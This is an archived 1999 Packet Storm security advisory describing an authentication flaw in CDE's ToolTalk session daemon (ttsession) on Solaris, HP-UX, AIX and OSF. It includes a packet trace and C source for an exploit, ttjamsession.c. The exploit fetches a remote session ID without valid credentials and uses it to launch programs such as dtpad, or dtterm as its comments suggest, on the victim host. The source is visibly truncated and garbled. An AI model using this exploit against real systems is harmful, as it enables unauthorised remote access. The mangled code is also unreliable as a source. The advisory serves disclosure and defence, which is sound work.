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packetstormPacket StormPACKETSTORM:15662
HistorySep 19, 1999 - 12:00 a.m.


Packet Storm
`Subject: Vulnerability in ttsession  
To: [email protected]   
I discovered the following security problem in ttsession, part of CDE:  
The ToolTalk session daemon ttsession does not properly check client  
The insufficient check can lead to compromise of a system from both local  
and remote with the credentials of the user running ttsession. Note that  
ttsession is not a system daemon and may not be running all the time. It is  
normally started as part of an X-session. Also client programs of ttsession  
may restart the daemon if it can not be found running.  
This problem has only been detected when the ttsession daemon is running with  
Unix RPC authentication flavor. This is the default. With options this can be  
changed to, for example, secure-RPC (DES). With CDE it can be configured in  
Affected systems  
As far as I know, ttsession has been part of OpenWindows (SunOS 4.1.x and  
Solaris), CDE (Solaris, AIX, HP, OSF/Digital, others?) and IRIX.  
It looks like most systems running CDE are vulnerable, although the only  
systems I have checked were:  
Solaris 7, 2.6, 2.5.1  
OSF v4.0  
HP-UX B.10.20  
AIX 2 4 000096754200  
It is unknown what the status with respect to SunOS 4.1.x and SGI is.  
The ttsession daemon is part of the ToolTalk toolkit and allows applications  
to send messages to each other. This is achieved by RPC calls. The RPC calls  
are not properly authenticated.  
When sniffing a tt_open request to a remote host the following can be seen:  
host1 -> host2 TCP D=33169 S=38194 Syn Seq=3510273898 Len=0  
host2 -> host1 TCP D=38194 S=33169 Syn Ack=3510273899 Seq=914492820  
host1 -> host2 TCP D=33169 S=38194 Ack=914492821 Seq=3510273899  
host1 -> host2 RPC C XID=932526186 PROG=1289637086 VERS=4 PROC=0  
host2 -> host1 TCP D=38194 S=33169 Ack=3510273971 Seq=914492821  
host2 -> host1 RPC R (#4) XID=932526186 Success  
host1 -> host2 RPC C XID=932526185 PROG=1289637086 VERS=4 PROC=400  
host2 -> host1 TCP D=38194 S=33169 Ack=3510274043 Seq=914492849  
host2 -> host1 RPC R (#7) XID=932526185 Success  
host1 -> host2 RPC C XID=932526184 PROG=1289637086 VERS=4 PROC=18  
host2 -> host1 RPC R (#10) XID=932526184 Success  
host1 -> host2 RPC C XID=932526183 PROG=1289637086 VERS=4 PROC=11  
host2 -> host1 RPC R (#12) XID=932526183 Success  
host1 -> host2 TCP D=33169 S=38194 Ack=914493001 Seq=3510274267  
host1 -> host2 TCP D=33169 S=38194 Fin Ack=914493001 Seq=3510274267  
host2 -> host1 TCP D=38194 S=33169 Ack=3510274268 Seq=914493001  
host2 -> host1 TCP D=38194 S=33169 Fin Ack=3510274268 Seq=914493001  
host1 -> host2 TCP D=33169 S=38194 Ack=914493002 Seq=3510274268  
This shows how first the NULL procedure of ttsession is called and next a  
procedure with number 400. Then procedure 18 and 11 are called. The contents  
of the reply to the PROC=400 call is something like:  
host2 -> host1 RPC R (#7) XID=932526185 Success  
0: 0800 0000 0000 0800 0000 0000 0800 4500 .. tUb.. .v...E.  
16: 0078 b3ab 4000 ff06 a2bf 7f00 0001 7f00 .x..@...........  
32: 0001 8191 9532 3682 0db1 d13a 87fb 5018 .....26....:..P.  
48: 2238 427e 0000 8000 004c 3795 3869 0000 "8B~.....L7.8i..  
64: 0001 0000 0000 0000 0000 0000 0000 0000 ................  
80: 0000 0000 002d 5020 3031 2031 3831 3736 .....-P 01 18176  
96: 2031 3238 3936 3337 3038 3620 3120 3020 1289637086 1 0  
112: 3130 3030 2031 302e 302e 302e 3130 2034 1000 4  
128: 0000 ..  
This same string can be found in the environment of a shell started as part  
of a CDE X-session (if it was started by ttsession):  
TT_SESSION=01 18176 1289637086 1 0 1000 4  
This is also described in the man page for ttession(1).  
When this strings is looked at more closely, some aspects can be recognized.  
The number 1289637086 for example is the RPC program number (Solaris 7). Also  
the IP of the remote host can be seen ( The number 18176 is the  
PID of the ttsession process and 1000 is the uid of the user running  
When playing around with the RPC call to retrieve this string from ttsession,  
I discovered it doesn't need client credentials to match the user which is  
running ttsession. Thus anyone can retrieve this string from a ttsession  
This combined with the discovery that the string is used by the tt_open call  
to determine the remote ttsession to connect to leads to the exploit code  
below. This code uses a message to invoke a dtpad on the host running  
ttsession. By using some tricks, it makes sure the dtpad is displayed on  
the requested DISPLAY.  
Reason why the exploit may fail:  
When a dtpad has been display on a X-server, it will keep a lock on that  
server until the dtpad -server process on the remote host has been  
terminated. Until that time no other dtpads from different hosts can be  
displayed on that Xserver. Close the X session and log back in again and  
try again.  
Job de Haas [email protected]  
ITSX bv  
* ttjamsession.c  
* Job de Haas  
* (c) ITSX bv 1999  
* This is a simple ttsession exploit to show some problems with  
* authentication of a remote user. The possibilities after authentication  
* are not limited to starting dtpad, but rather any ptype as can be shown  
* with tt_type_comp. On Solaris this includes dtterm.  
* compile with:  
* cc -L/usr/dt/lib -I/usr/dt/include -I/usr/openwin/include -ltt -lnsl  
* ttjamsession.c -o ttjamsession  
#include <stdio.h>  
#include <stdlib.h>  
#include <rpc/rpc.h>  
#include <string.h>  
#include <netdb.h>  
#include <arpa/inet.h>  
#include <pwd.h>  
#include <Tt/tt_c.h>  
#include <Tt/tttk.h>  
#define TTSESSION_PROG 1342177279  
#define TTSESSION_PROG_SOL7 1289637086  
#define TTSESSION_VERS 3  
long rpcprog = TTSESSION_PROG;  
int version = TTSESSION_VERS;  
long uid = -1;  
int use_env = 0;  
int test = 0;  
* For some reason the string is not returned with xdr_wrapstring. After  
* some fiddling this seems to work.  
xdr_mystring(xdrs, objp)  
register XDR *xdrs;  
char **objp;  
int len;  
if (!xdr_int(xdrs, &len)) {  
return 0;  
*objp = (char *)malloc(len + 1);  
if (xdr_opaque(xdrs, (caddr_t)*objp, len)) {  
(*objp)[len] = '\0';  
} else { return 0; }  
* This is some generated code by ttsnoop (nice program! at least on sol 2.6)  
* It was modified a bit to get it to spawn the program on the correct display  
process_Instantiate_reply( Tt_message msg, Tt_message pat );  
Tt_message context,  
char *action  
Tt_message msg;  
msg = tttk_message_create( context, TT_REQUEST, TT_SESSION,  
0, action,  
(Tt_message_callback)process_Instantiate_reply );  
tt_message_arg_add( msg, TT_IN, "data", "data");  
tt_message_context_set( msg, "$DISPLAY", getenv("DISPLAY"));  
tt_message_disposition_set( msg, TT_START);  
tt_message_handler_ptype_set( msg, "DTPAD");  
return msg;  
static Tt_callback_action  
Tt_message msg,  
Tt_message pat  
switch (tt_message_state(msg)) {  
case TT_SENT: /* handler is in this process */  
case TT_STARTED:/* intermediate state */  
case TT_QUEUED: /* intermediate state */  
default: /* unknown state */  
case TT_HANDLED:  
/* ... */  
case TT_FAILED: {  
int status;  
char *string;  
status = tt_message_status( msg );  
string = tt_message_status_string( msg );  
printf("message failed with: %s\n",string);  
/* ... */  
} break;  
tt_message_destroy( msg );  
* The routine to get the remote sessionid string.  
get_sessionid( remotehost, port)  
char *remotehost;  
ushort port;  
struct sockaddr_in server_addr;  
enum clnt_stat clnt_stat;  
struct hostent *hp;  
struct timeval timeout;  
CLIENT *clnt;  
int msock;  
char *buf;  
char *env;  
char *hostname;  
char localhost[MAXHOSTNAMELEN];  
memset((char *)&server_addr, 0, sizeof (server_addr));  
if (remotehost) {  
server_addr.sin_family = AF_INET;  
server_addr.sin_addr.s_addr = inet_addr(remotehost);  
if ( server_addr.sin_addr.s_addr == -1 ) {  
if ((hp = gethostbyname(remotehost)) == NULL) {  
printf("Can't resolve %s\n",remotehost);  
memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length);  
hostname = strdup( remotehost );  
else {  
if (gethostname(localhost, MAXHOSTNAMELEN)<0) {  
if (hp = gethostbyname(localhost)) {  
memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length);  
hostname = strdup( localhost );  
} else {  
server_addr.sin_addr.s_addr = inet_addr("");  
hostname = strdup( "" );  
server_addr.sin_family = AF_INET;  
server_addr.sin_port = htons(port);  
msock = RPC_ANYSOCK;  
timeout.tv_sec = 15;  
timeout.tv_usec = 0;  
if ( (clnt = (CLIENT *)clnttcp_create(&server_addr, rpcprog,  
TTSESSION_VERS, &msock, 10000, 10000)) == NULL) {  
* apparently credentials are not checked!  
clnt->cl_auth = authunix_create(hostname, 0, 0, 0, NULL);  
if ((clnt_stat = clnt_call(clnt, TTSESSION_GETSESSID,  
(xdrproc_t) xdr_void, (caddr_t) 0,  
(xdrproc_t) xdr_mystring, (caddr_t) &buf,  
timeout)) != RPC_SUCCESS) {  
clnt_perror(clnt, "get session");  
* put TT_SESSION in the environment for tt_open to use.  
env = malloc( strlen("TT_SESSION=") + strlen( buf+2 ) +1);  
putenv( env );  
printf("Session ID: %s\n", buf);  
char *progname;  
"Usage: %s [-p port] [-r rpc prognumber] [-u uid]\n", progname);  
fprintf(stderr," [-7] [-t] [-e] hostname\n");  
fprintf(stderr,"[-7] use Solaris 7 default ttsession program number\n");  
fprintf(stderr,"[-t] test the RPC call but not send messages\n");  
fprintf(stderr,"[-e] get TT_SESSION from environment (no RPC call)\n");  
int main(argc, argv)  
int argc;  
char **argv;  
char *hostname = NULL;  
struct in_addr addr;  
extern int optind;  
extern char *optarg;  
short port = 0;  
char c, *cp;  
Tt_message context, msg;  
char *procid;  
while ((c = getopt(argc, argv, "u:p:r:7et")) != EOF) {  
switch (c) {  
case 'r':  
rpcprog = atoi(optarg);  
case 'p':  
port = atoi(optarg);  
case 'u':  
uid = atoi(optarg);  
case '7':  
rpcprog = TTSESSION_PROG_SOL7;  
case 'e':  
use_env = 1;  
case 't':  
test = 1;  
if (optind < argc) {  
hostname = strdup(argv[optind++]);  
if (optind < argc) {  
port = atoi(argv[optind++]);  
if (optind < argc) {  
/* setup the socket and test correct service */  
if ( !use_env && (get_sessionid( hostname, port ) < 0 )) {  
printf("Failed to properly connect to ttsession\n");  
if (test) exit(0);  
* Open up the channel to ttsession. The code uses the TT_SESSION  
* environment var to figure out how.  
if (((procid = tt_open()) == NULL) || (*procid == '\0')) {  
* Now we can send messages... like instantiate a dtpad!  
* Two messages are sent to cause a new dtpad -server to be started  
* so that the dtpad will be displayed on our server even if the local  
* user is also using dtpad. I use sleep cause I can't seem to trigger  
* the callback.  
msg = create_Instantiate(context, NULL);  
msg = create_Instantiate(context, "Instantiate");  
/* no idea if I got to wait for the callback */  